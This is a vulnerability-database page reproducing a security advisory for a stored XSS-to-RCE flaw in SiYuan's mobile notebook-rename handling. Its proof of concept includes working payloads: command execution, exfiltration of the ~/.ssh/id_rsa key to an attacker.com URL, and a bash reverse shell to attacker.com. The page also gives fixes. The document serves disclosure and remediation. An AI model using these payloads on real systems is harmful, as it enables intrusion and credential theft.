Skip to main content

Docker CVE-2026-32751

CRITICAL
Cross-site Scripting (XSS) (CWE-79)
2026-03-16 https://github.com/siyuan-note/siyuan GHSA-qr46-rcv3-4hq3
Critical
Disputed · 9.0 NVD
Share

Severity by source

Sources disagree (Low–Critical)
GitHub Advisory PRIMARY
9.0 CRITICAL
AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
SUSE
3.1 LOW
AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

vuln.today treats the vendor’s rating as authoritative. A higher third-party CVSS (e.g. CISA-ADP) is shown for transparency but does not drive the headline severity.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

2
Analysis Generated
Mar 16, 2026 - 20:05 vuln.today
CVE Published
Mar 16, 2026 - 18:47 nvd
CRITICAL 9.0

DescriptionGitHub Advisory

Remote Code Execution via Stored XSS in Notebook Name - Mobile Interface

Summary

SiYuan's mobile file tree (MobileFiles.ts) renders notebook names via innerHTML without HTML escaping when processing renamenotebook WebSocket events. The desktop version (Files.ts) properly uses escapeHtml() for the same operation. An authenticated user who can rename notebooks can inject arbitrary HTML/JavaScript that executes on any mobile client viewing the file tree.

Since Electron is configured with nodeIntegration: true and contextIsolation: false, the injected JavaScript has full Node.js access, escalating stored XSS to full remote code execution. The mobile layout is also used in the Electron desktop app when the window is narrow, making this exploitable on desktop as well.

Affected Component

  • Vulnerable file: app/src/mobile/dock/MobileFiles.ts:77
  • Safe counterpart: app/src/layout/dock/Files.ts:104 (uses escapeHtml)
  • Backend (no escaping): kernel/api/notebook.go:104-116 (renameNotebook)
  • Electron config: app/electron/main.js:422-426 (nodeIntegration: true, contextIsolation: false)
  • Endpoint: POST /api/notebook/renameNotebook (authenticated)
  • Version: SiYuan <= 3.5.9

Vulnerable Code

Mobile - no escaping (MobileFiles.ts:77)

typescript
case "renamenotebook":
    this.element.querySelector(`[data-url="${data.data.box}"] .b3-list-item__text`).innerHTML = data.data.name;
    break;

Desktop - properly escaped (Files.ts:104)

typescript
case "renamenotebook":
    this.element.querySelector(`[data-url="${data.data.box}"] .b3-list-item__text`).innerHTML = escapeHtml(data.data.name);
    break;

Backend - sends unescaped name (notebook.go:104-116)

go
func renameNotebook(c *gin.Context) {
    // ...
    name := arg["name"].(string)
    err := model.RenameBox(notebook, name)
    // ...
    evt := util.NewCmdResult("renamenotebook", 0, util.PushModeBroadcast)
    evt.Data = map[string]interface{}{
        "box":  notebook,
        "name": name,  // Unescaped - sent directly to all clients
    }
    util.PushEvent(evt)
}

model.RenameBox() only validates length (512 chars max) and emptiness - no HTML sanitization.

Electron - Node.js in renderer (main.js:422-426)

javascript
webPreferences: {
    nodeIntegration: true,
    webviewTag: true,
    webSecurity: false,
    contextIsolation: false,
}

Any JavaScript executed via innerHTML has full access to require('child_process'), require('fs'), require('net'), etc.

Proof of Concept

Tested and confirmed on SiYuan v3.5.9 (Docker).

1. Set malicious notebook name (RCE payload)

http
POST /api/notebook/renameNotebook HTTP/1.1
Content-Type: application/json
Cookie: siyuan=<session>

{
    "notebook": "<NOTEBOOK_ID>",
    "name": "<img src=x onerror=\"require('child_process').exec('calc.exe')\">"
}

On Linux/macOS:

json
{
    "notebook": "<NOTEBOOK_ID>",
    "name": "<img src=x onerror=\"require('child_process').exec('id > /tmp/pwned')\">"
}

Confirmed: API accepts the name without escaping. The renamenotebook WebSocket event broadcasts the raw HTML to all connected clients.

2. Mobile client renders and executes

When any mobile client receives the renamenotebook event, MobileFiles.ts:77 sets innerHTML = data.data.name. The <img> tag's src=x fails to load, triggering onerror which calls require('child_process').exec() - arbitrary OS command execution.

3. Verified event content

python
# Unauthenticated WebSocket listener receives:
{
    "cmd": "renamenotebook",
    "data": {
        "box": "20260309161535-do8qg95",
        "name": "<img src=x onerror=\"require('child_process').exec('calc.exe')\">"
    }
}

The HTML/JS payload is preserved verbatim in the WebSocket event.

4. Data exfiltration variant

json
{
    "notebook": "<NOTEBOOK_ID>",
    "name": "<img src=x onerror=\"fetch('https://attacker.com/exfil?k='+require('fs').readFileSync(require('os').homedir()+'/.ssh/id_rsa','utf8'))\">"
}

5. Reverse shell variant

json
{
    "notebook": "<NOTEBOOK_ID>",
    "name": "<img src=x onerror=\"require('child_process').exec('bash -c \\\"bash -i >& /dev/tcp/attacker.com/4444 0>&1\\\"')\">"
}

Attack Scenario

  1. In a multi-user SiYuan deployment, an attacker with editor role renames a notebook with an RCE payload
  2. The renamenotebook event broadcasts the payload to ALL connected clients
  3. Any user viewing the file tree on the mobile interface (or desktop in narrow/mobile layout) triggers the payload
  4. nodeIntegration: true gives the injected JavaScript full OS access
  5. Attacker achieves arbitrary command execution on the victim's machine

Persistence: The notebook name is stored in the notebook's .siyuan/conf.json. The payload re-triggers every time the file tree renders on mobile - it survives restarts.

Sync vector: If the workspace is synced (SiYuan Cloud Sync or S3), the malicious notebook name propagates to all synced devices automatically.

Impact

  • Severity: CRITICAL (CVSS ~9.0)
  • Type: CWE-79 (Improper Neutralization of Input During Web Page Generation)
  • Full remote code execution on Electron desktop via nodeIntegration: true
  • Stored XSS - notebook names persist across sessions and survive restarts
  • Propagates via cloud sync to all synced devices
  • Affects all mobile interface users and desktop users in mobile/narrow layout
  • Inconsistent escaping - desktop is safe, mobile is not (indicates oversight)
  • Can steal files, credentials, SSH keys, install backdoors, open reverse shells

Suggested Fix

1. Apply the same escaping used in the desktop version

typescript
// Before (vulnerable):
this.element.querySelector(`[data-url="${data.data.box}"] .b3-list-item__text`).innerHTML = data.data.name;

// After (fixed):
this.element.querySelector(`[data-url="${data.data.box}"] .b3-list-item__text`).innerHTML = escapeHtml(data.data.name);

2. Sanitize notebook names on the backend

go
func RenameBox(boxID, name string) (err error) {
    name = util.EscapeHTML(name)  // Sanitize at the source
    // ...
}

3. Long-term: Harden Electron configuration

javascript
webPreferences: {
    nodeIntegration: false,
    contextIsolation: true,
    sandbox: true,
}

AnalysisAI

SiYuan's mobile file tree fails to sanitize notebook names in WebSocket rename events, allowing authenticated users to inject arbitrary HTML and JavaScript that executes in other clients' browsers. When combined with Electron's insecure configuration (nodeIntegration enabled, contextIsolation disabled), this stored XSS escalates to remote code execution with full Node.js privileges on affected desktop and mobile clients. The vulnerability affects users with notebook rename permissions across Docker, Node.js, Python, and Apple platforms.

Technical ContextAI

Cross-site scripting (XSS) allows injection of client-side scripts into web pages viewed by other users due to insufficient output encoding.

RemediationAI

Encode all user-supplied output contextually (HTML, JS, URL). Implement Content Security Policy (CSP) headers. Use HTTPOnly and Secure cookie flags.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Vendor StatusVendor

SUSE

Severity: Low
Product Status
openSUSE Leap 15.6 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP5 Fixed
SUSE Linux Enterprise Module for Package Hub 15 SP6 Fixed
openSUSE Leap 15.5 Fixed

Share

CVE-2026-32751 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy